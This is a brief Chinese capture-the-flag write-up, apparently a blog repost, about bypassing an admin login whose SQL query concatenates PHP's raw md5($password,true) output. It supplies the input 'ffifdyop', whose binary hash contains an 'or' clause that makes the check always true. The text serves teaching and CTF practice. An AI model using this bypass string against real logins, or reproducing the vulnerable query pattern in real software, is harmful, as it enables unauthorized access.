实验吧--后台登录(md5($str,true)类型绕过)

1、后台语句:  $sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";

分析:在php 中.(点好)起连接的作用

             MD5( )函数:


将密码转换成16进制的hex值以后,再将其转换成字符串后包含' 'or ' 6'<srash> 

SELECT * FROM admin WHERE pass=' 'or ' 6'<trash>

很明显可以注入了。

难点就在如何寻找这样的字符串,我只是顺手牵羊,牵了一个。。

提供一个字符串: ffifdyop

md5后,276f722736c95d99e921722cf9ed621c

再转成字符串:' ' 'or' 6<trach>

解析:存在  or  即代码的两边有一边为真既可以绕过,<trach>其实为垃圾代码没有任何用的。

or 后面有6,非零值即为真。既可以成功绕过。

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容